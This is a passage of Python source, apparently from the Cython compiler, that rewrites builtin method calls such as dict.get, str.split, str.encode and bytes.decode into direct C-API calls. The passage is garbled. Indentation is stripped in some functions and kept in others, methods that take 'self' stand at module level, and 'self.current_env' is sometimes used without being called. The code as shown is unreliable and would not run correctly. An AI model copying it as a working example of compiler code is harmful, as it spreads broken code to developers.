                return node
            convert_func = orig_index_type.to_py_function
            conversion_type = PyrexTypes.CFuncType(
                PyrexTypes.py_object_type, [PyrexTypes.CFuncTypeArg("intval", orig_index_type, None)])
            return ExprNodes.PythonCapiCallNode(
                node.pos, "__Pyx_Py%s_PopIndex" % type_name,
                self.PyObject_PopIndex_func_type,
                args=[obj, index,
                      ExprNodes.IntNode(index.pos, value=str(orig_index_type.signed and 1 or 0),
                                        constant_result=orig_index_type.signed and 1 or 0,
                                        type=PyrexTypes.c_int_type),
                      ExprNodes.RawCNameExprNode(index.pos, PyrexTypes.c_void_type,
                                                 orig_index_type.empty_declaration_code()),
                      ExprNodes.RawCNameExprNode(index.pos, conversion_type, convert_func)],
                may_return_none=True,
                is_temp=node.is_temp,
                utility_code=load_c_utility("pop_index"),
                )
        return node
single_param_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_returncode_type, [
PyrexTypes.CFuncTypeArg("obj", PyrexTypes.py_object_type, None),
],
exception_value = "-1")
def _handle_simple_method_list_sort(self, node, function, args, is_unbound_method):
"""Call PyList_Sort() instead of the 0-argument l.sort().
"""
if len(args) != 1:
return node
return self._substitute_method_call(
node, function, "PyList_Sort", self.single_param_func_type,
'sort', is_unbound_method, args).coerce_to(node.type, self.current_env)
    # __Pyx_PyDict_GetItemDefault(): (dict, key, default) -> value.
    Pyx_PyDict_GetItem_func_type = PyrexTypes.CFuncType(
        PyrexTypes.py_object_type, [
            PyrexTypes.CFuncTypeArg("dict", PyrexTypes.py_object_type, None),
            PyrexTypes.CFuncTypeArg("key", PyrexTypes.py_object_type, None),
            PyrexTypes.CFuncTypeArg("default", PyrexTypes.py_object_type, None),
            ])

    def _handle_simple_method_dict_get(self, node, function, args, is_unbound_method):
        """Replace dict.get() by a call to PyDict_GetItem().
        """
        if len(args) == 2:
            # the default value defaults to None
            args.append(ExprNodes.NoneNode(node.pos))
        elif len(args) != 3:
            self._error_wrong_arg_count('dict.get', node, args, "2 or 3")
            return node
        return self._substitute_method_call(
            node, function,
            "__Pyx_PyDict_GetItemDefault", self.Pyx_PyDict_GetItem_func_type,
            'get', is_unbound_method, args,
            may_return_none = True,
            utility_code = load_c_utility("dict_getitem_default"))
    # __Pyx_PyDict_SetDefault(): (dict, key, default, is_safe_type) -> value.
    Pyx_PyDict_SetDefault_func_type = PyrexTypes.CFuncType(
        PyrexTypes.py_object_type, [
            PyrexTypes.CFuncTypeArg("dict", PyrexTypes.py_object_type, None),
            PyrexTypes.CFuncTypeArg("key", PyrexTypes.py_object_type, None),
            PyrexTypes.CFuncTypeArg("default", PyrexTypes.py_object_type, None),
            PyrexTypes.CFuncTypeArg("is_safe_type", PyrexTypes.c_int_type, None),
            ])

    def _handle_simple_method_dict_setdefault(self, node, function, args, is_unbound_method):
        """Replace dict.setdefault() by calls to PyDict_GetItem() and PyDict_SetItem().
        """
        if len(args) == 2:
            # the default value defaults to None
            args.append(ExprNodes.NoneNode(node.pos))
        elif len(args) != 3:
            self._error_wrong_arg_count('dict.setdefault', node, args, "2 or 3")
            return node
        # classify the key type: "safe" builtin key types cannot run user
        # code in __hash__/__eq__, which lets the helper take a faster path
        key_type = args[1].type
        if key_type.is_builtin_type:
            is_safe_type = int(key_type.name in
                               'str bytes unicode float int long bool')
        elif key_type is PyrexTypes.py_object_type:
            is_safe_type = -1 # don't know
        else:
            is_safe_type = 0 # definitely not
        args.append(ExprNodes.IntNode(
            node.pos, value=str(is_safe_type), constant_result=is_safe_type))
        return self._substitute_method_call(
            node, function,
            "__Pyx_PyDict_SetDefault", self.Pyx_PyDict_SetDefault_func_type,
            'setdefault', is_unbound_method, args,
            may_return_none=True,
            utility_code=load_c_utility('dict_setdefault'))
### unicode type methods
PyUnicode_uchar_predicate_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_bint_type, [
PyrexTypes.CFuncTypeArg("uchar", PyrexTypes.c_py_ucs4_type, None),
])
def _inject_unicode_predicate(self, node, function, args, is_unbound_method):
if is_unbound_method or len(args) != 1:
return node
ustring = args[0]
if not isinstance(ustring, ExprNodes.CoerceToPyTypeNode) or \
not ustring.arg.type.is_unicode_char:
return node
uchar = ustring.arg
method_name = function.attribute
if method_name == 'istitle':
# istitle() doesn't directly map to Py_UNICODE_ISTITLE()
utility_code = UtilityCode.load_cached(
"py_unicode_istitle", "StringTools.c")
function_name = '__Pyx_Py_UNICODE_ISTITLE'
else:
utility_code = None
function_name = 'Py_UNICODE_%s' % method_name.upper()
func_call = self._substitute_method_call(
node, function,
function_name, self.PyUnicode_uchar_predicate_func_type,
method_name, is_unbound_method, [uchar],
utility_code = utility_code)
if node.type.is_pyobject:
func_call = func_call.coerce_to_pyobject(self.current_env)
return func_call
_handle_simple_method_unicode_isalnum = _inject_unicode_predicate
_handle_simple_method_unicode_isalpha = _inject_unicode_predicate
_handle_simple_method_unicode_isdecimal = _inject_unicode_predicate
_handle_simple_method_unicode_isdigit = _inject_unicode_predicate
_handle_simple_method_unicode_islower = _inject_unicode_predicate
_handle_simple_method_unicode_isnumeric = _inject_unicode_predicate
_handle_simple_method_unicode_isspace = _inject_unicode_predicate
_handle_simple_method_unicode_istitle = _inject_unicode_predicate
_handle_simple_method_unicode_isupper = _inject_unicode_predicate
PyUnicode_uchar_conversion_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ucs4_type, [
PyrexTypes.CFuncTypeArg("uchar", PyrexTypes.c_py_ucs4_type, None),
])
def _inject_unicode_character_conversion(self, node, function, args, is_unbound_method):
if is_unbound_method or len(args) != 1:
return node
ustring = args[0]
if not isinstance(ustring, ExprNodes.CoerceToPyTypeNode) or \
not ustring.arg.type.is_unicode_char:
return node
uchar = ustring.arg
method_name = function.attribute
function_name = 'Py_UNICODE_TO%s' % method_name.upper()
func_call = self._substitute_method_call(
node, function,
function_name, self.PyUnicode_uchar_conversion_func_type,
method_name, is_unbound_method, [uchar])
if node.type.is_pyobject:
func_call = func_call.coerce_to_pyobject(self.current_env)
return func_call
_handle_simple_method_unicode_lower = _inject_unicode_character_conversion
_handle_simple_method_unicode_upper = _inject_unicode_character_conversion
_handle_simple_method_unicode_title = _inject_unicode_character_conversion
    # PyUnicode_Splitlines(): (str, keepends) -> list.
    PyUnicode_Splitlines_func_type = PyrexTypes.CFuncType(
        Builtin.list_type, [
            PyrexTypes.CFuncTypeArg("str", Builtin.unicode_type, None),
            PyrexTypes.CFuncTypeArg("keepends", PyrexTypes.c_bint_type, None),
            ])

    def _handle_simple_method_unicode_splitlines(self, node, function, args, is_unbound_method):
        """Replace unicode.splitlines(...) by a direct call to the
        corresponding C-API function.
        """
        if len(args) not in (1,2):
            self._error_wrong_arg_count('unicode.splitlines', node, args, "1 or 2")
            return node
        # keepends defaults to False
        self._inject_bint_default_argument(node, args, 1, False)
        return self._substitute_method_call(
            node, function,
            "PyUnicode_Splitlines", self.PyUnicode_Splitlines_func_type,
            'splitlines', is_unbound_method, args)
    # PyUnicode_Split(): (str, sep, maxsplit) -> list.
    PyUnicode_Split_func_type = PyrexTypes.CFuncType(
        Builtin.list_type, [
            PyrexTypes.CFuncTypeArg("str", Builtin.unicode_type, None),
            PyrexTypes.CFuncTypeArg("sep", PyrexTypes.py_object_type, None),
            PyrexTypes.CFuncTypeArg("maxsplit", PyrexTypes.c_py_ssize_t_type, None),
            ]
        )

    def _handle_simple_method_unicode_split(self, node, function, args, is_unbound_method):
        """Replace unicode.split(...) by a direct call to the
        corresponding C-API function.
        """
        if len(args) not in (1,2,3):
            self._error_wrong_arg_count('unicode.split', node, args, "1-3")
            return node
        if len(args) < 2:
            # no separator: NULL selects whitespace splitting
            args.append(ExprNodes.NullNode(node.pos))
        # maxsplit defaults to -1 (no limit)
        self._inject_int_default_argument(
            node, args, 2, PyrexTypes.c_py_ssize_t_type, "-1")
        return self._substitute_method_call(
            node, function,
            "PyUnicode_Split", self.PyUnicode_Split_func_type,
            'split', is_unbound_method, args)
    # __Pyx_Py*_Tailmatch(): (str, substring, start, end, direction) -> bint;
    # -1 on error.
    PyString_Tailmatch_func_type = PyrexTypes.CFuncType(
        PyrexTypes.c_bint_type, [
            PyrexTypes.CFuncTypeArg("str", PyrexTypes.py_object_type, None), # bytes/str/unicode
            PyrexTypes.CFuncTypeArg("substring", PyrexTypes.py_object_type, None),
            PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
            PyrexTypes.CFuncTypeArg("end", PyrexTypes.c_py_ssize_t_type, None),
            PyrexTypes.CFuncTypeArg("direction", PyrexTypes.c_int_type, None),
            ],
        exception_value = '-1')

    def _handle_simple_method_unicode_endswith(self, node, function, args, is_unbound_method):
        # direction +1 matches at the end of the string
        return self._inject_tailmatch(
            node, function, args, is_unbound_method, 'unicode', 'endswith',
            unicode_tailmatch_utility_code, +1)

    def _handle_simple_method_unicode_startswith(self, node, function, args, is_unbound_method):
        # direction -1 matches at the start of the string
        return self._inject_tailmatch(
            node, function, args, is_unbound_method, 'unicode', 'startswith',
            unicode_tailmatch_utility_code, -1)
def _inject_tailmatch(self, node, function, args, is_unbound_method, type_name,
                      method_name, utility_code, direction):
    """Replace unicode.startswith(...) and unicode.endswith(...)
    by a direct call to the corresponding C-API function.

    'args' is [self, substring, start?, end?]; missing start/end default
    to 0 and PY_SSIZE_T_MAX, then 'direction' is appended as a fifth
    argument for the tailmatch helper.  The result is coerced back to a
    Python bool.
    """
    if len(args) not in (2,3,4):
        self._error_wrong_arg_count('%s.%s' % (type_name, method_name), node, args, "2-4")
        return node
    self._inject_int_default_argument(
        node, args, 2, PyrexTypes.c_py_ssize_t_type, "0")
    self._inject_int_default_argument(
        node, args, 3, PyrexTypes.c_py_ssize_t_type, "PY_SSIZE_T_MAX")
    args.append(ExprNodes.IntNode(
        node.pos, value=str(direction), type=PyrexTypes.c_int_type))
    method_call = self._substitute_method_call(
        node, function,
        "__Pyx_Py%s_Tailmatch" % type_name.capitalize(),
        self.PyString_Tailmatch_func_type,
        method_name, is_unbound_method, args,
        utility_code = utility_code)
    return method_call.coerce_to(Builtin.bool_type, self.current_env())
# C signature of PyUnicode_Find(); exception value is -2 because -1 is a
# valid "not found" result.
PyUnicode_Find_func_type = PyrexTypes.CFuncType(
    PyrexTypes.c_py_ssize_t_type, [
        PyrexTypes.CFuncTypeArg("str", Builtin.unicode_type, None),
        PyrexTypes.CFuncTypeArg("substring", PyrexTypes.py_object_type, None),
        PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
        PyrexTypes.CFuncTypeArg("end", PyrexTypes.c_py_ssize_t_type, None),
        PyrexTypes.CFuncTypeArg("direction", PyrexTypes.c_int_type, None),
    ],
    exception_value = '-2')
def _handle_simple_method_unicode_find(self, node, function, args, is_unbound_method):
    # unicode.find() searches forwards => direction +1
    return self._inject_unicode_find(
        node, function, args, is_unbound_method, 'find', +1)
def _handle_simple_method_unicode_rfind(self, node, function, args, is_unbound_method):
    # unicode.rfind() searches backwards => direction -1
    return self._inject_unicode_find(
        node, function, args, is_unbound_method, 'rfind', -1)
def _inject_unicode_find(self, node, function, args, is_unbound_method,
                         method_name, direction):
    """Replace unicode.find(...) and unicode.rfind(...) by a
    direct call to the corresponding C-API function.

    Missing start/end arguments default to 0 and PY_SSIZE_T_MAX; the
    C result (a Py_ssize_t index) is coerced back to a Python object.
    """
    if len(args) not in (2,3,4):
        self._error_wrong_arg_count('unicode.%s' % method_name, node, args, "2-4")
        return node
    self._inject_int_default_argument(
        node, args, 2, PyrexTypes.c_py_ssize_t_type, "0")
    self._inject_int_default_argument(
        node, args, 3, PyrexTypes.c_py_ssize_t_type, "PY_SSIZE_T_MAX")
    args.append(ExprNodes.IntNode(
        node.pos, value=str(direction), type=PyrexTypes.c_int_type))
    method_call = self._substitute_method_call(
        node, function, "PyUnicode_Find", self.PyUnicode_Find_func_type,
        method_name, is_unbound_method, args)
    return method_call.coerce_to_pyobject(self.current_env())
# C signature of PyUnicode_Count(): unicode.count(sub, start, end) -> Py_ssize_t.
PyUnicode_Count_func_type = PyrexTypes.CFuncType(
    PyrexTypes.c_py_ssize_t_type, [
        PyrexTypes.CFuncTypeArg("str", Builtin.unicode_type, None),
        PyrexTypes.CFuncTypeArg("substring", PyrexTypes.py_object_type, None),
        PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
        PyrexTypes.CFuncTypeArg("end", PyrexTypes.c_py_ssize_t_type, None),
    ],
    exception_value = '-1')
def _handle_simple_method_unicode_count(self, node, function, args, is_unbound_method):
    """Replace unicode.count(...) by a direct call to the
    corresponding C-API function.

    Missing start/end default to 0 / PY_SSIZE_T_MAX; the Py_ssize_t
    result is coerced back to a Python object.
    """
    if len(args) not in (2,3,4):
        self._error_wrong_arg_count('unicode.count', node, args, "2-4")
        return node
    self._inject_int_default_argument(
        node, args, 2, PyrexTypes.c_py_ssize_t_type, "0")
    self._inject_int_default_argument(
        node, args, 3, PyrexTypes.c_py_ssize_t_type, "PY_SSIZE_T_MAX")
    method_call = self._substitute_method_call(
        node, function, "PyUnicode_Count", self.PyUnicode_Count_func_type,
        'count', is_unbound_method, args)
    return method_call.coerce_to_pyobject(self.current_env())
# C signature of PyUnicode_Replace(): unicode.replace(old, new, maxcount) -> unicode.
PyUnicode_Replace_func_type = PyrexTypes.CFuncType(
    Builtin.unicode_type, [
        PyrexTypes.CFuncTypeArg("str", Builtin.unicode_type, None),
        PyrexTypes.CFuncTypeArg("substring", PyrexTypes.py_object_type, None),
        PyrexTypes.CFuncTypeArg("replstr", PyrexTypes.py_object_type, None),
        PyrexTypes.CFuncTypeArg("maxcount", PyrexTypes.c_py_ssize_t_type, None),
    ])
def _handle_simple_method_unicode_replace(self, node, function, args, is_unbound_method):
    """Replace unicode.replace(...) by a direct call to the
    corresponding C-API function.
    """
    if len(args) not in (3,4):
        self._error_wrong_arg_count('unicode.replace', node, args, "3-4")
        return node
    # maxcount defaults to -1 (replace all occurrences)
    self._inject_int_default_argument(
        node, args, 3, PyrexTypes.c_py_ssize_t_type, "-1")
    return self._substitute_method_call(
        node, function, "PyUnicode_Replace", self.PyUnicode_Replace_func_type,
        'replace', is_unbound_method, args)
# C signature of PyUnicode_AsEncodedString(): generic encode with explicit
# encoding and error-handling names (NULL => defaults).
PyUnicode_AsEncodedString_func_type = PyrexTypes.CFuncType(
    Builtin.bytes_type, [
        PyrexTypes.CFuncTypeArg("obj", Builtin.unicode_type, None),
        PyrexTypes.CFuncTypeArg("encoding", PyrexTypes.c_char_ptr_type, None),
        PyrexTypes.CFuncTypeArg("errors", PyrexTypes.c_char_ptr_type, None),
    ])

# C signature shared by the codec-specific PyUnicode_As<Xyz>String() helpers.
PyUnicode_AsXyzString_func_type = PyrexTypes.CFuncType(
    Builtin.bytes_type, [
        PyrexTypes.CFuncTypeArg("obj", Builtin.unicode_type, None),
    ])
# Encodings that have a dedicated PyUnicode_As<Name>String()/
# PyUnicode_Decode<Name>() C-API function.  The names are spelled exactly
# as they appear in the C function names.
_special_encodings = ['UTF8', 'UTF16', 'Latin1', 'ASCII',
                      'unicode_escape', 'raw_unicode_escape']

# Pre-resolved (name, encoder) pairs; comparing encoder objects lets
# _find_special_codec_name() match any alias of these encodings.
_special_codecs = [ (name, codecs.getencoder(name))
                    for name in _special_encodings ]
def _handle_simple_method_unicode_encode(self, node, function, args, is_unbound_method):
    """Replace unicode.encode(...) by a direct C-API call to the
    corresponding codec.

    Strategy, in order of preference:
    1. no arguments => PyUnicode_AsEncodedString(obj, NULL, NULL);
    2. constant string with known encoding => encode at compile time;
    3. known encoding with 'strict' errors => codec-specific
       PyUnicode_As<Xyz>String() helper;
    4. otherwise => generic PyUnicode_AsEncodedString().
    """
    if len(args) < 1 or len(args) > 3:
        self._error_wrong_arg_count('unicode.encode', node, args, '1-3')
        return node

    string_node = args[0]

    if len(args) == 1:
        null_node = ExprNodes.NullNode(node.pos)
        return self._substitute_method_call(
            node, function, "PyUnicode_AsEncodedString",
            self.PyUnicode_AsEncodedString_func_type,
            'encode', is_unbound_method, [string_node, null_node, null_node])

    parameters = self._unpack_encoding_and_error_mode(node.pos, args)
    if parameters is None:
        return node
    encoding, encoding_node, error_handling, error_handling_node = parameters

    if encoding and isinstance(string_node, ExprNodes.UnicodeNode):
        # constant, so try to do the encoding at compile time
        try:
            value = string_node.value.encode(encoding, error_handling)
        except Exception:
            # FIX: was a bare 'except:', which also swallowed SystemExit and
            # KeyboardInterrupt.  Any (normal) failure just means we cannot
            # encode at compile time and must leave it to runtime.
            pass
        else:
            value = BytesLiteral(value)
            value.encoding = encoding
            return ExprNodes.BytesNode(
                string_node.pos, value=value, type=Builtin.bytes_type)

    if encoding and error_handling == 'strict':
        # try to find a specific encoder function
        codec_name = self._find_special_codec_name(encoding)
        if codec_name is not None:
            encode_function = "PyUnicode_As%sString" % codec_name
            return self._substitute_method_call(
                node, function, encode_function,
                self.PyUnicode_AsXyzString_func_type,
                'encode', is_unbound_method, [string_node])

    return self._substitute_method_call(
        node, function, "PyUnicode_AsEncodedString",
        self.PyUnicode_AsEncodedString_func_type,
        'encode', is_unbound_method,
        [string_node, encoding_node, error_handling_node])
# Pointer type of the codec-specific PyUnicode_Decode<Xyz>() C functions,
# passed to the decode helpers below (NULL => use the generic decoder).
PyUnicode_DecodeXyz_func_ptr_type = PyrexTypes.CPtrType(PyrexTypes.CFuncType(
    Builtin.unicode_type, [
        PyrexTypes.CFuncTypeArg("string", PyrexTypes.c_char_ptr_type, None),
        PyrexTypes.CFuncTypeArg("size", PyrexTypes.c_py_ssize_t_type, None),
        PyrexTypes.CFuncTypeArg("errors", PyrexTypes.c_char_ptr_type, None),
    ]))

# Signature of __Pyx_decode_c_string(): decode a slice of a plain char*.
_decode_c_string_func_type = PyrexTypes.CFuncType(
    Builtin.unicode_type, [
        PyrexTypes.CFuncTypeArg("string", PyrexTypes.c_char_ptr_type, None),
        PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
        PyrexTypes.CFuncTypeArg("stop", PyrexTypes.c_py_ssize_t_type, None),
        PyrexTypes.CFuncTypeArg("encoding", PyrexTypes.c_char_ptr_type, None),
        PyrexTypes.CFuncTypeArg("errors", PyrexTypes.c_char_ptr_type, None),
        PyrexTypes.CFuncTypeArg("decode_func", PyUnicode_DecodeXyz_func_ptr_type, None),
    ])

# Signature of __Pyx_decode_bytes()/__Pyx_decode_bytearray(): decode a slice
# of a Python bytes/bytearray object.
_decode_bytes_func_type = PyrexTypes.CFuncType(
    Builtin.unicode_type, [
        PyrexTypes.CFuncTypeArg("string", PyrexTypes.py_object_type, None),
        PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
        PyrexTypes.CFuncTypeArg("stop", PyrexTypes.c_py_ssize_t_type, None),
        PyrexTypes.CFuncTypeArg("encoding", PyrexTypes.c_char_ptr_type, None),
        PyrexTypes.CFuncTypeArg("errors", PyrexTypes.c_char_ptr_type, None),
        PyrexTypes.CFuncTypeArg("decode_func", PyUnicode_DecodeXyz_func_ptr_type, None),
    ])

# Built on first use because it embeds the concrete C++ string type.
_decode_cpp_string_func_type = None  # lazy init
def _handle_simple_method_bytes_decode(self, node, function, args, is_unbound_method):
    """Replace char*.decode() by a direct C-API call to the
    corresponding codec, possibly resolving a slice on the char*.

    Handles three source types: plain C strings (char*), C++ std::string,
    and Python bytes/bytearray objects.  A slice on the source is folded
    into start/stop arguments of the decode helper instead of creating an
    intermediate object.
    """
    if not (1 <= len(args) <= 3):
        self._error_wrong_arg_count('bytes.decode', node, args, '1-3')
        return node

    # normalise input nodes
    string_node = args[0]
    start = stop = None
    if isinstance(string_node, ExprNodes.SliceIndexNode):
        # decode a slice directly: s[a:b].decode(...) => decode(s, a, b, ...)
        index_node = string_node
        string_node = index_node.base
        start, stop = index_node.start, index_node.stop
        if not start or start.constant_result == 0:
            start = None
    if isinstance(string_node, ExprNodes.CoerceToPyTypeNode):
        # unwrap the raw C value behind an automatic Python coercion
        string_node = string_node.arg

    string_type = string_node.type
    if string_type in (Builtin.bytes_type, Builtin.bytearray_type):
        # keep CPython's None handling: raise the appropriate error message
        # depending on bound vs unbound method call
        if is_unbound_method:
            string_node = string_node.as_none_safe_node(
                "descriptor '%s' requires a '%s' object but received a 'NoneType'",
                format_args=['decode', string_type.name])
        else:
            string_node = string_node.as_none_safe_node(
                "'NoneType' object has no attribute '%s'",
                error="PyExc_AttributeError",
                format_args=['decode'])
    elif not string_type.is_string and not string_type.is_cpp_string:
        # nothing to optimise here
        return node

    parameters = self._unpack_encoding_and_error_mode(node.pos, args)
    if parameters is None:
        return node
    encoding, encoding_node, error_handling, error_handling_node = parameters

    if not start:
        start = ExprNodes.IntNode(node.pos, value='0', constant_result=0)
    elif not start.type.is_int:
        start = start.coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
    if stop and not stop.type.is_int:
        stop = stop.coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())

    # try to find a specific encoder function
    codec_name = None
    if encoding is not None:
        codec_name = self._find_special_codec_name(encoding)
    if codec_name is not None:
        # pass the codec-specific C function; encoding string not needed then
        decode_function = ExprNodes.RawCNameExprNode(
            node.pos, type=self.PyUnicode_DecodeXyz_func_ptr_type,
            cname="PyUnicode_Decode%s" % codec_name)
        encoding_node = ExprNodes.NullNode(node.pos)
    else:
        decode_function = ExprNodes.NullNode(node.pos)

    # build the helper function call
    temps = []
    if string_type.is_string:
        # C string
        if not stop:
            # use strlen() to find the string length, just as CPython would
            if not string_node.is_name:
                string_node = UtilNodes.LetRefNode(string_node)  # used twice
                temps.append(string_node)
            stop = ExprNodes.PythonCapiCallNode(
                string_node.pos, "strlen", self.Pyx_strlen_func_type,
                args=[string_node],
                is_temp=False,
                utility_code=UtilityCode.load_cached("IncludeStringH", "StringTools.c"),
            ).coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
        helper_func_type = self._decode_c_string_func_type
        utility_code_name = 'decode_c_string'
    elif string_type.is_cpp_string:
        # C++ std::string
        if not stop:
            stop = ExprNodes.IntNode(node.pos, value='PY_SSIZE_T_MAX',
                                     constant_result=ExprNodes.not_a_constant)
        if self._decode_cpp_string_func_type is None:
            # lazy init to reuse the C++ string type
            self._decode_cpp_string_func_type = PyrexTypes.CFuncType(
                Builtin.unicode_type, [
                    PyrexTypes.CFuncTypeArg("string", string_type, None),
                    PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
                    PyrexTypes.CFuncTypeArg("stop", PyrexTypes.c_py_ssize_t_type, None),
                    PyrexTypes.CFuncTypeArg("encoding", PyrexTypes.c_char_ptr_type, None),
                    PyrexTypes.CFuncTypeArg("errors", PyrexTypes.c_char_ptr_type, None),
                    PyrexTypes.CFuncTypeArg("decode_func", self.PyUnicode_DecodeXyz_func_ptr_type, None),
                ])
        helper_func_type = self._decode_cpp_string_func_type
        utility_code_name = 'decode_cpp_string'
    else:
        # Python bytes/bytearray object
        if not stop:
            stop = ExprNodes.IntNode(node.pos, value='PY_SSIZE_T_MAX',
                                     constant_result=ExprNodes.not_a_constant)
        helper_func_type = self._decode_bytes_func_type
        if string_type is Builtin.bytes_type:
            utility_code_name = 'decode_bytes'
        else:
            utility_code_name = 'decode_bytearray'

    node = ExprNodes.PythonCapiCallNode(
        node.pos, '__Pyx_%s' % utility_code_name, helper_func_type,
        args=[string_node, start, stop, encoding_node, error_handling_node, decode_function],
        is_temp=node.is_temp,
        utility_code=UtilityCode.load_cached(utility_code_name, 'StringTools.c'),
    )

    # wrap any LetRefNode temps created above around the result
    for temp in temps[::-1]:
        node = UtilNodes.EvalWithTempExprNode(temp, node)
    return node

# bytearray.decode() is handled identically
_handle_simple_method_bytearray_decode = _handle_simple_method_bytes_decode
def _find_special_codec_name(self, encoding):
try:
requested_codec = codecs.getencoder(encoding)
except LookupError:
return None
for name, codec in self._special_codecs:
if codec == requested_codec:
if '_' in name:
name = ''.join([s.capitalize()
for s in name.split('_')])
return name
return None
def _unpack_encoding_and_error_mode(self, pos, args):
    """Extract (encoding, encoding_node, error_handling,
    error_handling_node) from an encode()/decode() argument list.

    Missing arguments default to NULL / 'strict'; an explicit 'strict'
    is also passed as NULL since that is the C-API default.  Returns
    None if an argument cannot be reduced to a C string.
    """
    null_node = ExprNodes.NullNode(pos)

    encoding, encoding_node = None, null_node
    if len(args) >= 2:
        encoding, encoding_node = self._unpack_string_and_cstring_node(args[1])
        if encoding_node is None:
            return None

    error_handling, error_handling_node = 'strict', null_node
    if len(args) == 3:
        error_handling, error_handling_node = self._unpack_string_and_cstring_node(args[2])
        if error_handling_node is None:
            return None
        if error_handling == 'strict':
            error_handling_node = null_node

    return (encoding, encoding_node, error_handling, error_handling_node)
def _unpack_string_and_cstring_node(self, node):
    """Reduce a string argument node to (python_value, char*-typed node).

    Returns (None, coerced node) when the value is not known at compile
    time but can still be passed as a C string, and (None, None) when
    the argument cannot be used as a C string at all.
    """
    if isinstance(node, ExprNodes.CoerceToPyTypeNode):
        # unwrap an automatic C -> Python coercion
        node = node.arg
    if isinstance(node, ExprNodes.UnicodeNode):
        encoding = node.value
        node = ExprNodes.BytesNode(
            node.pos, value=BytesLiteral(encoding.utf8encode()),
            type=PyrexTypes.c_char_ptr_type)
    elif isinstance(node, (ExprNodes.StringNode, ExprNodes.BytesNode)):
        # byte strings are decoded as Latin-1, which maps bytes 1:1 to code points
        encoding = node.value.decode('ISO-8859-1')
        node = ExprNodes.BytesNode(
            node.pos, value=node.value, type=PyrexTypes.c_char_ptr_type)
    elif node.type is Builtin.bytes_type:
        # runtime bytes object: value unknown, but coercible to char*
        encoding = None
        node = node.coerce_to(PyrexTypes.c_char_ptr_type, self.current_env())
    elif node.type.is_string:
        # already a C string; value unknown at compile time
        encoding = None
    else:
        # cannot handle this argument type
        encoding = node = None
    return encoding, node
def _handle_simple_method_str_endswith(self, node, function, args, is_unbound_method):
    # str.endswith() => tailmatch with direction +1
    return self._inject_tailmatch(
        node, function, args, is_unbound_method, 'str', 'endswith',
        str_tailmatch_utility_code, +1)
def _handle_simple_method_str_startswith(self, node, function, args, is_unbound_method):
    # str.startswith() => tailmatch with direction -1
    return self._inject_tailmatch(
        node, function, args, is_unbound_method, 'str', 'startswith',
        str_tailmatch_utility_code, -1)
def _handle_simple_method_bytes_endswith(self, node, function, args, is_unbound_method):
    # bytes.endswith() => tailmatch with direction +1
    return self._inject_tailmatch(
        node, function, args, is_unbound_method, 'bytes', 'endswith',
        bytes_tailmatch_utility_code, +1)
def _handle_simple_method_bytes_startswith(self, node, function, args, is_unbound_method):
    # bytes.startswith() => tailmatch with direction -1
    return self._inject_tailmatch(
        node, function, args, is_unbound_method, 'bytes', 'startswith',
        bytes_tailmatch_utility_code, -1)
''' # disabled for now, enable when we consider it worth it (see StringTools.c)
def _handle_simple_method_bytearray_endswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'bytearray', 'endswith',
bytes_tailmatch_utility_code, +1)
def _handle_simple_method_bytearray_startswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'bytearray', 'startswith',
bytes_tailmatch_utility_code, -1)
'''
### helpers
def _substitute_method_call(self, node, function, name, func_type,
                            attr_name, is_unbound_method, args=(),
                            utility_code=None, is_temp=None,
                            may_return_none=ExprNodes.PythonCapiCallNode.may_return_none):
    """Build a PythonCapiCallNode that replaces a builtin method call.

    'name'/'func_type' describe the C function, 'attr_name' the original
    Python method name (used for None-error messages).  The first
    argument (the 'self' object of the call) gets a None-safety check
    that mimics CPython's error message for the bound/unbound case.
    """
    args = list(args)
    if args and not args[0].is_literal:
        self_arg = args[0]
        if is_unbound_method:
            self_arg = self_arg.as_none_safe_node(
                "descriptor '%s' requires a '%s' object but received a 'NoneType'",
                format_args=[attr_name, function.obj.name])
        else:
            self_arg = self_arg.as_none_safe_node(
                "'NoneType' object has no attribute '%s'",
                error = "PyExc_AttributeError",
                format_args = [attr_name])
        args[0] = self_arg
    if is_temp is None:
        is_temp = node.is_temp
    return ExprNodes.PythonCapiCallNode(
        node.pos, name, func_type,
        args = args,
        is_temp = is_temp,
        utility_code = utility_code,
        may_return_none = may_return_none,
        result_is_used = node.result_is_used,
    )
def _inject_int_default_argument(self, node, args, arg_index, type, default_value):
    """Make sure args[arg_index] exists as a C integer: append the given
    default for a missing optional argument, otherwise coerce the
    present argument to the expected C integer type.
    """
    assert len(args) >= arg_index
    if len(args) > arg_index:
        args[arg_index] = args[arg_index].coerce_to(type, self.current_env())
    else:
        args.append(ExprNodes.IntNode(node.pos, value=str(default_value),
                                      type=type, constant_result=default_value))
def _inject_bint_default_argument(self, node, args, arg_index, default_value):
    """Make sure args[arg_index] exists as a C boolean: append the given
    default for a missing optional argument, otherwise coerce the
    present argument to a boolean.
    """
    assert len(args) >= arg_index
    if len(args) > arg_index:
        args[arg_index] = args[arg_index].coerce_to_boolean(self.current_env())
    else:
        bool_default = bool(default_value)
        args.append(ExprNodes.BoolNode(node.pos, value=bool_default,
                                       constant_result=bool_default))
# C helper implementations for the startswith()/endswith() optimisations above.
unicode_tailmatch_utility_code = UtilityCode.load_cached('unicode_tailmatch', 'StringTools.c')
bytes_tailmatch_utility_code = UtilityCode.load_cached('bytes_tailmatch', 'StringTools.c')
str_tailmatch_utility_code = UtilityCode.load_cached('str_tailmatch', 'StringTools.c')
class ConstantFolding(Visitor.VisitorTransform, SkipDeclarations):
    """Calculate the result of constant expressions to store it in
    ``expr_node.constant_result``, and replace trivial cases by their
    constant result.

    General rules:

    - We calculate float constants to make them available to the
      compiler, but we do not aggregate them into a single literal
      node to prevent any loss of precision.

